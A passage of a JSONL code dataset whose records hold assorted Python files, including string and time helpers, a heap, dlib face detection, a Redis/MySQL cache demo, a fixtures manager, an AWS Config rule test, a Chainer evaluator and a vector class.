re.split(\",(?=(?:[^\\\\[\\\\]]*(?:\\\\[[^\\\\[\\\\]]*\\\\]))*[^\\\\[\\\\]]*$)\", test[1:-1]) # splits only , outside of [] bc of recursive lists [[a, b], [c, d]]\n \n if len(l) == 1 and l[0] == \"\":\n return []\n \n return to_number(l, strip_quotes)\n \n if strip_quotes == True:\n return re.sub('^[\\s]*([\"\\'])([\\s\\S]*)(\\\\1)$', \"\\\\2\", obj)\n return obj\n\ndef to_str(obj, add_quotes = True):\n if is_list(obj):\n strs = []\n for o in obj:\n strs.append(to_str(o, add_quotes))\n res = \"[\" + \",\".join(strs) + \"]\"\n return res\n elif is_dict(obj):\n return dict([(k, to_str(v, add_quotes)) for k, v in obj.items()])\n elif is_str(obj):\n if add_quotes:\n if \"'\" in obj:\n return '\"{}\"'.format(obj)\n else:\n return \"'{}'\".format(obj)\n #~ return str([obj])[1:-1] #trick since the list chooses the right quotes\n else:\n return obj\n else:\n return str(obj)\n\n@listable\ndef split_clean(string, strip_quotes = False):\n string = re.sub(\"^[\\\\s]+|[\\\\s]+$\", \"\", string) # remove front and back whitespace (strip would also work)\n not_in_quotes = '(?=(?:[^\"\\']*(?:\"[^\"]*\"|\\'[^\\']*\\'))*[^\"\\']*$)'\n e = '\\\\s+'+not_in_quotes # split on whitespace sections but not in \"\" or ''\n prog = re.compile(e)\n res = prog.split(string)\n if strip_quotes:\n for i in range(len(res)):\n res[i] = re.sub('^([\"\\'])([\\s\\S]*)(\\\\1)$', \"\\\\2\", res[i]) #strips \"\" or '' if found at ^ and $\n return res\n else:\n return res\n\ndef sstr(obj, length = 50):\n sv = str(obj)\n if len(sv) > length: # shorten too lengthong objects to size 60\n sv = sv[:length//2] + \" ...{}... \".format(len(sv) - length) + sv[-length//2:]\n return sv\n\n#------------------- time conversion 00:00:00 -> sec -------------------\ndef time_int(t_str):\n t_str = to_number(t_str.split(\":\"))\n return 3600 * t_str[0] + 60 * t_str[1] + t_str[2]\n\n#------------------- time conversion sec -> 00:00:00 -------------------\ndef time_str(sec_int):\n return \"{:02d}:{:02d}:{:02d}\".format(int(sec_int / 3600), int(sec_int / 60) % 60, int(sec_int) % 60)\n\ndef ms_time_str(sec_float):\n if sec_float < 60:\n return \"{:.1f}s\".format(sec_float)\n else:\n return \"{}m {:.0f}s\".format(int(sec_float/60), sec_float%60)\n \ndef dyn_time_str(t_int):\n y, d, h, m, s = [int(t_int / (60 * 60 * 24 * 365))\n , int(t_int / (60 * 60 * 24)) % 365\n , int(t_int / (60 * 60)) % 24\n , int(t_int / (60)) % 60\n , int(t_int) % 60]\n if d == 0:\n return \"{:02d}:{:02d}:{:02d}\".format(h, m, s)\n else:\n res = \"\"\n if y > 0:\n res += \"{}y \".format(y)\n res += \"{}d {:02d}h\".format(d, h)\n return res\n\ndef padding(s, modulo, char = \" \"):\n \"\"\"\n Padding a string to a multiple length of modulo.\n \"\"\"\n if is_bytes(s):\n char = char.encode()\n \n if len(s) % modulo != 0:\n return s.ljust(len(s) + modulo - len(s) % modulo, char)\n else:\n return s\n","sub_path":"ptools/io_manip.py","file_name":"io_manip.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"225106849","text":"class Heap:\n\tdef __init__(self):\n\t\tself.m_heap = []\n\n\tdef empty(self):\n\t\treturn len(self.m_heap) == 0\n\n\tdef size(self):\n\t\treturn len(self.m_heap)\n\n\tdef print_heap(self):\n\t\tprint(self.m_heap)\n\n\tdef push(self, n):\n\t\tpos = len(self.m_heap)\n\t\tself.m_heap.append(n)\n\t\twhile (pos != 0 and self.comp(pos, (pos-1)//2)):\n\t\t\tself.swap(pos, (pos-1)//2)\n\t\t\tpos = (pos-1)//2\n\n\tdef pop(self):\n\t\tlength = len(self.m_heap)\n\t\tif length == 0:\n\t\t\treturn None\n\t\ttemp = self.m_heap[0]\n\t\tif length == 1:\n\t\t\tdel self.m_heap[0]\n\t\t\treturn temp\n\t\tself.m_heap[0] = self.m_heap[-1]\n\t\tdel self.m_heap[-1]\n\t\tself.relocate_top(length-1, 0)\n\t\treturn temp\n\n\n\tdef relocate_top(self, length, pos):\n\t\tleft = 2 * pos + 1\n\t\tright = 2 * pos + 2\n\t\tif (left < length and right < length):\n\t\t\tswap_pos = self.greater(left, right)\n\t\t\tif not self.comp(pos, swap_pos):\n\t\t\t\tself.swap(pos, swap_pos)\n\t\t\t\tself.relocate_top(length, swap_pos)\n\t\telif (left < length):\n\t\t\tif not self.comp(pos, left):\n\t\t\t\tself.swap(pos, left)\n\t\t\t\tself.relocate_top(length, left)\n\t\telif (right < length):\n\t\t\tif not self.comp(pos, right):\n\t\t\t\tself.swap(pos, left)\n\t\t\t\tself.relocate_top(length, left)\n\t\treturn\n\n\n\tdef greater(self, a, b):\n\t\treturn a if self.m_heap[a] > self.m_heap[b] else b\n\n\tdef comp(self, a, b):\n\t\treturn True if self.greater(a, b) == a else False\n\n\tdef swap(self, a, b):\n\t\ttemp = self.m_heap[a]\n\t\tself.m_heap[a] = self.m_heap[b]\n\t\tself.m_heap[b] = temp\n\n\nclass MinHeap(Heap):\n\tdef greater(self, a, b):\n\t\treturn a if self.m_heap[a] < self.m_heap[b] else b\n\n\n\nif __name__ == '__main__':\n\ta = MinHeap()\n\tb = [17,80,35,41,70,56,75,58,57,53,88,46,12,10,69,84,86,37,67,40,]\n\tfor i in b:\n\t\ta.push(i)\n\tc = [a.pop() for i in range(20)]\n\tprint(c)\n","sub_path":"utils/heap.py","file_name":"heap.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"409412850","text":"import cv2\nimport dlib\nimport sys\n\n# Get user supplied values\nimagePath = sys.argv[1]\n\n# Create dlib face detector\ndetector=dlib.get_frontal_face_detector()\n\n# Read the image\nimage = cv2.imread(imagePath)\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Detect faces in the image\nrects = detector(gray, 0)\n\nprint(\"Found {0} faces!\".format(len(rects)))\n\n# Draw a rectangle around the faces\ni = 0\nfor rect in rects:\n\ti = i + 1\n\tcv2.rectangle(\n\t\timage, \n\t\t(rect.left(), rect.top()), \n\t\t(rect.right(), rect.bottom()), \n\t\t(0, 255, 0), \n\t\t2\n\t)\n\tcv2.putText(\n\t\timage, \n\t\t\"Face@{}\".format(i), \n\t\t(rect.left(), rect.top()), \n\t\tcv2.FONT_HERSHEY_SIMPLEX, \n\t\t0.5, \n\t\t(255, 0, 255), \n\t\t1\n\t)\n\ncv2.imshow(\"Faces found Result\", image)\ncv2.waitKey(0)\n","sub_path":"face_detect_dlib.py","file_name":"face_detect_dlib.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"343328625","text":"import pymysql\nimport redis\n\n\ndb=pymysql.connect(host='127.0.0.1',\n user='root',\n password='123456',\n database='userdb',\n port=3306,\n charset='utf8'\n )\n\nr=redis.Redis(host='127.0.0.1',db=0,port=6379)\n\nusername=input(\"请输入姓名\")\nresult=r.hmget(username,'gender','age')\nif result==None:\n print(result[0],result[1])\nelse:\n cursor=db.cursor()\n cursor.execute('select gender,age from user where username=%s',[username])\n userinfo=cursor.fetchall()\n if not userinfo:\n print(\"Mysql用户信息不在\")\n else:\n dict={\n 'gender':userinfo[0][0],\n 'age':userinfo[0][1]\n }\n r.hmset(username,dict)\n r.expire(username,60*5)\n print(\"载入redis\")\n\n","sub_path":"untitled/month05/redis/redis_mysql.py","file_name":"redis_mysql.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"88829719","text":"from __future__ import print_function\n\nfrom glob import glob\nfrom itertools import chain\nimport os\n\nfrom charlatan import _compat\nfrom charlatan.depgraph import DepGraph\nfrom charlatan.file_format import load_file\nfrom charlatan.fixture import Fixture\nfrom charlatan.fixture_collection import ListFixtureCollection\nfrom charlatan.fixture_collection import DictFixtureCollection\n\nALLOWED_HOOKS = (\"before_save\", \"after_save\", \"before_install\",\n \"after_install\")\nROOT_COLLECTION = \"root\"\n\n\ndef is_sqlalchemy_model(instance):\n \"\"\"Return True if instance is an SQLAlchemy model instance.\"\"\"\n\n from sqlalchemy.orm.util import class_mapper\n from sqlalchemy.orm.exc import UnmappedClassError\n\n try:\n class_mapper(instance.__class__)\n\n except UnmappedClassError:\n return False\n\n else:\n return True\n\n\ndef make_list(obj):\n \"\"\"Return list of objects if necessary.\"\"\"\n if isinstance(obj, _compat.string_types):\n return (obj, )\n return obj\n\n\nclass FixturesManager(object):\n\n \"\"\"\n Manage Fixture objects.\n\n :param Session db_session: sqlalchemy Session object\n\n .. versionadded:: 0.3.0\n ``db_session`` argument was added.\n\n \"\"\"\n\n def __init__(self, db_session=None, use_unicode=False):\n self.hooks = {}\n self.session = db_session\n self.installed_keys = []\n self.use_unicode = use_unicode\n\n def load(self, filenames, models_package=\"\"):\n \"\"\"Pre-load the fixtures.\n\n :param list_or_str filename: file or list of files that holds the\n fixture data\n :param str models_package: package holding the models definition\n\n Note that this does not effectively instantiate anything. It just does\n some pre-instantiation work, like prepending the root model package\n and doing some basic sanity check.\n\n .. versionchanged:: 0.3.0\n ``db_session`` argument was removed and put in the object's\n constructor arguments.\n\n .. versionchanged:: 0.3.7\n ``filename`` argument was changed to ``filenames``, which can be\n list or string.\n\n \"\"\"\n\n self.filenames = filenames\n self.models_package = models_package\n\n # Load the data\n fixtures, self.depgraph = self._load_fixtures(self.filenames)\n self.fixture_collection = DictFixtureCollection(\n ROOT_COLLECTION,\n fixture_manager=self,\n fixtures=fixtures)\n\n # Initiate the cache\n self.clean_cache()\n\n def _get_namespace_from_filename(self, filename):\n \"\"\"Get a collection namespace from a fixtures filename.\n\n :param str filename: filename to extract namespace from\n \"\"\"\n\n segments = os.path.basename(filename).split(\".\")\n if len(segments) > 2:\n raise ValueError(\"Fixtures filename stem may not contain periods\")\n\n return segments[0]\n\n def _load_fixtures(self, filenames):\n \"\"\"Pre-load the fixtures.\n\n :param list or str filenames: files that hold the fixture data\n \"\"\"\n\n if isinstance(filenames, _compat.string_types):\n globbed_filenames = glob(filenames)\n else:\n globbed_filenames = list(\n chain.from_iterable(glob(f) for f in filenames)\n )\n\n if len(globbed_filenames) == 1:\n content = load_file(filenames, self.use_unicode)\n else:\n content = {}\n\n for filename in globbed_filenames:\n namespace = self._get_namespace_from_filename(filename)\n content[namespace] = {\n \"objects\": load_file(filename, self.use_unicode)\n }\n\n fixtures = {}\n for k, v in _compat.iteritems(content):\n\n if \"objects\" in v:\n # It's a collection of fictures.\n fixtures[k] = self._handle_collection(\n namespace=k,\n definition=v,\n objects=v[\"objects\"],\n )\n\n # Named fixtures\n else:\n if \"id\" in v:\n # Renaming id because it's a Python builtin function\n v[\"id_\"] = v[\"id\"]\n del v[\"id\"]\n\n fixtures[k] = Fixture(key=k, fixture_manager=self, **v)\n\n d = DepGraph()\n for fixture in fixtures.values():\n for dependency, _ in fixture.extract_relationships():\n d.add_edge(dependency, fixture.key)\n\n # This does nothing except raise an error if there's a cycle\n d.topo_sort()\n return fixtures, d\n\n def _handle_collection(self, namespace, definition, objects):\n \"\"\"Handle a collection of fixtures.\n\n :param dict definition: definition of the collection\n :param dict_or_list objects: fixtures in the collection\n\n \"\"\"\n\n if isinstance(objects, list):\n klass = ListFixtureCollection\n else:\n klass = DictFixtureCollection\n\n collection = klass(\n key=namespace,\n fixture_manager=self,\n model=definition.get('model'),\n fields=definition.get('fields'),\n post_creation=definition.get('post_creation'),\n inherit_from=definition.get('inherit_from'),\n depend_on=definition.get('depend_on'),\n )\n\n for name, new_fields in collection.iterator(objects):\n qualified_name = \"%s.%s\" % (namespace, name)\n\n if \"objects\" in new_fields:\n # A nested collection, either because we're dealing with a file\n # collection or a sub-collection.\n fixture = self._handle_collection(\n namespace=qualified_name,\n definition=new_fields,\n objects=new_fields[\"objects\"]\n )\n else:\n model = new_fields.pop(\"model\", None)\n # In the case of a file collection we'll be dealing with\n # PyYAML's output from that file, which means that individual\n # fixtures in this collection have the \"fields\" field.\n fields = new_fields.pop(\"fields\", new_fields)\n inherit_from = namespace if model is None else None\n\n fixture = Fixture(\n key=qualified_name,\n fixture_manager=self,\n # Automatically inherit from the collection\n inherit_from=inherit_from,\n fields=fields,\n model=model\n # The rest (default fields, etc.) is\n # automatically inherited from the collection.\n )\n collection.add(name, fixture)\n\n return collection\n\n def clean_cache(self):\n \"\"\"Clean the cache.\"\"\"\n self.cache = {}\n self.installed_keys = []\n\n def save_instance(self, instance):\n \"\"\"Save a fixture instance.\n\n If it's a SQLAlchemy model, it will be added to the session and\n the session will be committed.\n\n Otherwise, a :meth:`save` method will be run if the instance has\n one. If it does not have one, nothing will happen.\n\n Before and after the process, the :func:`before_save` and\n :func:`after_save` hook are run.\n\n \"\"\"\n\n self._get_hook(\"before_save\")(instance)\n\n if self.session and is_sqlalchemy_model(instance):\n self.session.add(instance)\n self.session.commit()\n\n else:\n getattr(instance, \"save\", lambda: None)()\n\n self._get_hook(\"after_save\")(instance)\n\n def delete_instance(self, instance):\n \"\"\"Delete a fixture instance.\n\n If it's a SQLAlchemy model, it will be deleted from the session and the\n session will be committed.\n\n Otherwise, :meth:`delete_instance` will be run first. If the instance\n does not have it, :meth:`delete` will be run. If the instance does not\n have it, nothing will happen.\n\n Before and after the process, the :func:`before_delete` and\n :func:`after_delete` hook are run.\n\n \"\"\"\n\n self._get_hook(\"before_delete\")(instance)\n\n if self.session and is_sqlalchemy_model(instance):\n self.session.delete(instance)\n self.session.commit()\n\n else:\n try:\n getattr(instance, \"delete_instance\")()\n except AttributeError:\n getattr(instance, \"delete\", lambda: None)()\n\n self._get_hook(\"after_delete\")(instance)\n\n def install_fixture(self, fixture_key, do_not_save=False, attrs=None):\n\n \"\"\"Install a fixture.\n\n :param str fixture_key:\n :param bool do_not_save: True if fixture should not be saved.\n :param dict attrs: override fields\n\n :rtype: :data:`fixture_instance`\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n\n try:\n self._get_hook(\"before_install\")()\n instance = self.get_fixture(fixture_key, attrs=attrs)\n\n # Save the instance\n if not do_not_save:\n if hasattr(instance, '__iter__'):\n # Save all the instances!\n for model in instance:\n self.save_instance(model)\n self.save_instance(instance)\n\n except Exception as exc:\n self._get_hook(\"after_install\")(exc)\n raise\n\n else:\n self._get_hook(\"after_install\")(None)\n return instance\n\n def install_fixtures(self, fixture_keys, do_not_save=False):\n \"\"\"Install a list of fixtures.\n\n :param fixture_keys: fixtures to be installed\n :type fixture_keys: str or list of strs\n :param bool do_not_save: True if fixture should not be saved.\n\n :rtype: list of :data:`fixture_instance`\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n instances = []\n for f in make_list(fixture_keys):\n instances.append(self.install_fixture(f, do_not_save=do_not_save))\n\n return instances\n\n def install_all_fixtures(self, do_not_save=False):\n \"\"\"Install all fixtures.\n\n :param bool do_not_save: True if fixture should not be saved.\n\n :rtype: list of :data:`fixture_instance`\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n\n return self.install_fixtures(self.keys(), do_not_save=do_not_save)\n\n def uninstall_fixture(self, fixture_key, do_not_delete=False):\n \"\"\"Uninstall a fixture.\n\n :param str fixture_key:\n :param bool do_not_delete: True if fixture should not be deleted.\n\n :rtype: :data:`fixture_instance` or None if no instance was uninstalled\n with the given key\n \"\"\"\n\n try:\n self._get_hook(\"before_uninstall\")()\n instance = self.cache.get(fixture_key)\n if instance:\n self.cache.pop(fixture_key, None)\n self.installed_keys.remove(fixture_key)\n\n # delete the instance\n if not do_not_delete:\n self.delete_instance(instance)\n\n except Exception as exc:\n self._get_hook(\"after_uninstall\")(exc)\n raise\n\n else:\n self._get_hook(\"after_uninstall\")(None)\n return instance\n\n def uninstall_fixtures(self, fixture_keys, do_not_delete=False):\n \"\"\"Uninstall a list of installed fixtures.\n\n If a given fixture was not previously installed, nothing happens and\n its instance is not part of the returned list.\n\n :param fixture_keys: fixtures to be uninstalled\n :type fixture_keys: str or list of strs\n :param bool do_not_delete: True if fixture should not be deleted.\n\n :rtype: list of :data:`fixture_instance`\n \"\"\"\n instances = []\n for fixture_key in make_list(fixture_keys):\n instance = self.uninstall_fixture(fixture_key, do_not_delete)\n if instance:\n instances.append(instance)\n\n return instances\n\n def uninstall_all_fixtures(self, do_not_delete=False):\n \"\"\"Uninstall all installed fixtures.\n\n :param bool do_not_delete: True if fixture should not be deleted.\n\n :rtype: list of :data:`fixture_instance`\n \"\"\"\n installed_fixtures = list(self.installed_keys)\n installed_fixtures.reverse()\n return self.uninstall_fixtures(installed_fixtures)\n\n def keys(self):\n \"\"\"Return all fixture keys.\"\"\"\n return self.fixture_collection.fixtures.keys()\n\n def get_fixture(self, fixture_key, attrs=None):\n \"\"\"Return a fixture instance (but do not save it).\n\n :param str fixture_key:\n :param dict attrs: override fields\n\n :rtype: instantiated but unsaved fixture\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n # initialize all parents in topological order\n parents = []\n for fixture in self.depgraph.ancestors_of(fixture_key):\n parents.append(self.get_fixture(fixture))\n\n # Fixture are cached so that setting up relationships is not too\n # expensive. We don't get the cached version if attrs are\n # overriden.\n returned = None\n\n if not attrs:\n returned = self.cache.get(fixture_key)\n\n if not returned:\n returned = self.fixture_collection.get_instance(\n fixture_key, fields=attrs,\n )\n\n self.cache[fixture_key] = returned\n self.installed_keys.append(fixture_key)\n\n return returned\n\n def get_fixtures(self, fixture_keys):\n \"\"\"Return a list of fixtures instances.\n\n :param iterable fixture_keys:\n\n :rtype: list of instantiated but unsaved fixtures\n\n .. versionremoved:: 0.3.7\n ``include_relationships`` argument was removed.\n\n \"\"\"\n fixtures = []\n for f in fixture_keys:\n fixtures.append(self.get_fixture(f))\n return fixtures\n\n def _get_hook(self, hook_name):\n \"\"\"Return a hook.\"\"\"\n\n if hook_name in self.hooks:\n return self.hooks[hook_name]\n\n return lambda *args: None\n\n def set_hook(self, hookname, func):\n \"\"\"Add a hook.\n\n :param str hookname:\n :param function func:\n \"\"\"\n\n if hookname not in ALLOWED_HOOKS:\n raise KeyError(\"'%s' is not an allowed hook.\" % hookname)\n\n self.hooks[hookname] = func\n","sub_path":"charlatan/fixtures_manager.py","file_name":"fixtures_manager.py","file_ext":"py","file_size_in_byte":14751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"484560527","text":"import datetime\nimport json\nimport logging\nimport unittest\nfrom unittest.mock import patch, MagicMock\nfrom botocore.exceptions import ClientError\nfrom rdklib import Evaluation, ComplianceType\nimport rdklibtest\n\n##############\n# Parameters #\n##############\n\n# Define the default resource to report to Config Rules\n# TODO - Replace with your resource type\nRESOURCE_TYPE = \"AWS::IAM::Role\"\n\n#############\n# Main Code #\n#############\n\nMODULE = __import__(\"check_security_hub_aggregator\")\nRULE = MODULE.check_security_hub_aggregator()\n\nCLIENT_FACTORY = MagicMock()\n\n# example for mocking IAM API calls\nIAM_CLIENT_MOCK = MagicMock()\n# STS client for getting account ID\nSTS_CLIENT_MOCK = MagicMock()\n\n\ndef mock_get_client(client_name, *args, **kwargs):\n if client_name == \"iam\":\n return IAM_CLIENT_MOCK\n if client_name == \"sts\":\n return STS_CLIENT_MOCK\n raise Exception(\"Attempting to create an unknown client\")\n\n\n@patch.object(CLIENT_FACTORY, \"build_client\", MagicMock(side_effect=mock_get_client))\nclass ComplianceTest(unittest.TestCase):\n rule_parameters = {\n \"SomeParameterKey\": \"SomeParameterValue\",\n \"SomeParameterKey2\": \"SomeParameterValue2\",\n }\n\n role_sample_configuration_abridged = {\"arn\": \"some-arn\", \"roleName\": \"testrole\"}\n\n invoking_event_iam_role_sample = {\n \"configurationItem\": {\n \"relatedEvents\": [],\n \"relationships\": [],\n \"configuration\": role_sample_configuration_abridged,\n \"tags\": {},\n \"configurationItemCaptureTime\": \"2018-07-02T03:37:52.418Z\",\n \"awsAccountId\": \"123456789012\",\n \"configurationItemStatus\": \"ResourceDiscovered\",\n \"resourceType\": \"AWS::IAM::Role\",\n \"resourceId\": \"some-resource-id\",\n \"resourceName\": \"some-resource-name\",\n \"ARN\": \"some-arn\",\n },\n \"notificationCreationTime\": \"2018-07-02T23:05:34.445Z\",\n \"messageType\": \"ConfigurationItemChangeNotification\",\n \"executionRoleArn\": \"arn:aws:dummy\",\n }\n\n list_roles_response = {\n \"Roles\": [\n {\n \"Path\": \"/\",\n \"RoleName\": \"testrole\",\n \"RoleId\": \"some-role-id\",\n \"Arn\": \"arn:aws:iam::111111111111:role/testrole\",\n \"CreateDate\": datetime.datetime(2015, 1, 1),\n \"Description\": \"this is a test role\",\n \"MaxSessionDuration\": 123,\n \"Tags\": [\n {\"Key\": \"one_tag\", \"Value\": \"its_value\"},\n ],\n \"RoleLastUsed\": {\n \"LastUsedDate\": datetime.datetime(2015, 1, 1),\n \"Region\": \"us-east-1\",\n },\n },\n ]\n }\n test_account_id = \"111111111111\"\n get_caller_identity_response = {\"Account\": test_account_id}\n\n def setUp(self):\n STS_CLIENT_MOCK.reset_mock()\n\n def test_sample(self):\n self.assertTrue(True)\n\n # Example of how to evaluate a configuration change rule\n def test_configurationchange_rule(self):\n # Mock any usage of get_caller_identity\n STS_CLIENT_MOCK.get_caller_identity = MagicMock(\n return_value=self.get_caller_identity_response\n )\n response = RULE.evaluate_change(\n event=json.dumps(self.invoking_event_iam_role_sample),\n client_factory=CLIENT_FACTORY,\n configuration_item=self.role_sample_configuration_abridged,\n valid_rule_parameters=json.dumps(self.rule_parameters),\n )\n resp_expected = []\n resp_expected.append(\n Evaluation(\n complianceType=ComplianceType.NOT_APPLICABLE,\n annotation=\"This is a configuration change rule's annotation.\",\n resourceId=self.invoking_event_iam_role_sample.get(\n \"configurationItem\", {}\n ).get(\"resourceId\", None),\n resourceType=RESOURCE_TYPE,\n )\n )\n if vars(response[0]) != vars(resp_expected[0]):\n logging.warning(f\"Actual response: {vars(response[0])}\")\n logging.warning(f\"Expected response: {vars(resp_expected[0])}\")\n rdklibtest.assert_successful_evaluation(self, response, resp_expected)\n\n # Example of how to mock the client response for a list_roles API call\n def test_periodic_rule(self):\n # Mock any usage of get_caller_identity\n STS_CLIENT_MOCK.get_caller_identity = MagicMock(\n return_value=self.get_caller_identity_response\n )\n IAM_CLIENT_MOCK.list_roles = MagicMock(return_value=self.list_roles_response)\n # Example of how to evaluate a periodic rule\n response = RULE.evaluate_periodic(\n event=rdklibtest.create_test_scheduled_event(self.rule_parameters),\n client_factory=CLIENT_FACTORY,\n valid_rule_parameters=json.dumps(self.rule_parameters),\n )\n resp_expected = []\n resp_expected.append(\n Evaluation(\n complianceType=ComplianceType.NOT_APPLICABLE,\n resourceId=self.invoking_event_iam_role_sample.get(\n \"configurationItem\", {}\n ).get(\"awsAccountId\", None),\n resourceType=\"AWS::::Account\",\n annotation=\"This is a periodic rule's annotation.\",\n )\n )\n if vars(response[0]) != vars(resp_expected[0]):\n logging.warning(f\"Actual response: {vars(response[0])}\")\n logging.warning(f\"Expected response: {vars(resp_expected[0])}\")\n rdklibtest.assert_successful_evaluation(self, response, resp_expected)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"rdk/template/runtime/python3.7-lib/rule_test.py","file_name":"rule_test.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"265862579","text":"import chainer\r\nimport chainer.functions as F\r\nfrom chainer.backends import cuda\r\nfrom chainer.training import extensions\r\nfrom chainer import reporter as reporter_module\r\nfrom chainer import function\r\nimport numpy as np\r\n\r\n\r\nclass Evaluator(extensions.Evaluator):\r\n def evaluate(self):\r\n iterator = self._iterators['main']\r\n eval_func = self.eval_func or self._targets['main']\r\n if self.eval_hook:\r\n self.eval_hook(self)\r\n\r\n if hasattr(iterator, 'reset'):\r\n iterator.reset()\r\n it = iterator\r\n else:\r\n it = copy.copy(iterator)\r\n\r\n summary = reporter_module.DictSummary()\r\n\r\n while True:\r\n batch = it.next()\r\n observation = {}\r\n with reporter_module.report_scope(observation):\r\n in_arrays = self.converter(batch, self.device)\r\n with function.no_backprop_mode():\r\n if isinstance(in_arrays, tuple):\r\n eval_func(*in_arrays)\r\n elif isinstance(in_arrays, dict):\r\n eval_func(**in_arrays)\r\n else:\r\n eval_func(in_arrays)\r\n\r\n summary.add(observation)\r\n if it.is_new_epoch:\r\n break\r\n out = summary.compute_mean()\r\n print('#############################################', out)\r\n return out\r\n","sub_path":"neural_network/Modified_module/Modified_Evaluater.py","file_name":"Modified_Evaluater.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"174432774","text":"# Author: ninuxer\n# Date: 2018/05/14 11:07\n# File: 多进程之创建方式.py\n\n\n\"\"\"\n多进程multiprocess模块与多线程threading模块的接口基本一致\njoin()、setDeamon()等方法基本一致\n\"\"\"\n\n# # 创建进程方式一:\n# import multiprocessing\n# import os\n#\n#\n# def func(n):\n# print('{} is run now,my PID is {}, parent_pid is {}'.format(n, os.getpid(), os.getppid()))\n#\n#\n# if __name__ == '__main__': # 在windows系统下,主进程的内容要加到main下,否则会报错\n# p_list = []\n#\n# for i in range(5):\n# p = multiprocessing.Process(target=func, args=(i,))\n# p.start()\n# p_list.append(p)\n#\n# # 有了join,因此主进程的此print会在所有子进程结束后才打印\n# for j in p_list:\n# j.join()\n# print('I am main process,my pid is {}'.format(os.getpid()))\n\n\n# 创建进程的方式二\n\nimport multiprocessing\nimport os\n\n\nclass MyProcess(multiprocessing.Process):\n def __init__(self, n):\n super(MyProcess, self).__init__()\n self.name = n\n\n def run(self):\n print('{} is run now,my PID is {}, parent_pid is {}'.format(self.name, os.getpid(), os.getppid()))\n\n\nif __name__ == '__main__':\n\n for i in range(5):\n name = 'nwc'+str(i)\n p = MyProcess(name)\n p.start()\n\n print('I am main process,my pid is {}'.format(os.getpid()))\n\n","sub_path":"2018-05-14/多进程之创建方式.py","file_name":"多进程之创建方式.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127951470","text":"# This file add funtion to check for Parallelism and Orthogonality\n\nfrom math import sqrt, acos, pi\nfrom decimal import Decimal, getcontext\ngetcontext().prec = 30\n\n# using Decimal package, which gives us better numerical precision\n\ngetcontext().prec = 30\n\nclass Vector(object):\n def __init__(self, coordinates):\n try:\n if not coordinates:\n raise ValueError\n self.coordinates = tuple( [Decimal(x) for x in coordinates] )\n self.dimension = len(self.coordinates)\n\n except ValueError:\n raise ValueError('The coordinates must be nonempty')\n except TypeError:\n raise TypeError('The coordinates must be an iterable')\n\n def __str__(self):\n return 'Vector: {}'.format(self.coordinates)\n\n def __eq__(self, v):\n return self.coordinates == v.coordinates\n\n def plus(self, v):\n new_coordinates = [x+y for x,y in zip(self.coordinates, v.coordinates)]\n return Vector(new_coordinates)\n\n def minus(self, v):\n new_coordinates = [x-y for x,y in zip(self.coordinates, v.coordinates)]\n return Vector(new_coordinates)\n\n def times_scalar(self, c):\n new_coordinates = [Decimal(c)*x for x in self.coordinates]\n return Vector(new_coordinates)\n\n def magnitude(self):\n coordinates_squared = [x**2 for x in self.coordinates] # x^2\n return Decimal.sqrt(sum(coordinates_squared)) # DECIMAL !!!\n\n def normalized(self):\n try:\n magnitude = self.magnitude()\n return self.times_scalar(Decimal('1.0')/magnitude) # U = V/||V||\n except ZeroDivisionError: # if self=0\n raise Exception('Cannot normalize the zero vector')\n\n def dot(self, v):\n return sum([x*y for x,y in zip(self.coordinates, v.coordinates)])\n\n def angle_with(self, v, in_degrees=False):\n try:\n u1 = self.normalized()\n u2 = v.normalized()\n angle_in_radians = acos(u1.dot(u2)) # =arccos() # from math module\n if in_degrees:\n degrees_per_radian = 180. / pi # pi is also from math module\n return angle_in_radians * degrees_per_radian\n else:\n return angle_in_radians\n except Exception as e: # if self=0\n if str(e) == 'Cannot normalize the zero vector' :\n raise Exception('Cannot compute an angle with the zero vector')\n else:\n raise e\n\n\n # Function checking for Orthogonality\n def is_orthogonal_to(self, v, tolerance=1e-10):\n return abs(self.dot(v)) < tolerance # return Boolean True/False\n\n\n # Function checking for Parallelism\n def is_zero(self, tolerance=1e-10):\n return self.magnitude() < tolerance # return Boolean True/False\n\n def is_parallel_to(self, v): # return Boolean True/False\n return ( self.is_zero() or v.is_zero() or\n # if any one is 0, they're parallel\n self.angle_with(v) == 0 or # pointing same direction\n self.angle_with(v) == pi ) # pointing opposite directions\n\n\n########################### Test Function ##########################\nprint ('first pair ...')\nv = Vector(['-7.579','-7.88'])\nw = Vector(['22.737','23.64'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('second pair ...')\nv = Vector(['-2.029','9.97', '4.172'])\nw = Vector(['-9.231','-6.639', '-7.245'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('third pair ...')\nv = Vector(['-2.328','-7.284', '-1.214'])\nw = Vector(['-1.821','1.072', '-2.94'])\nprint ('is parallel:', v.is_parallel_to(w))\nprint ('is orthogonal:', v.is_orthogonal_to(w))\n\nprint ('fourth pair ...')\nv = Vector(['2.118','4.827'])\nw = 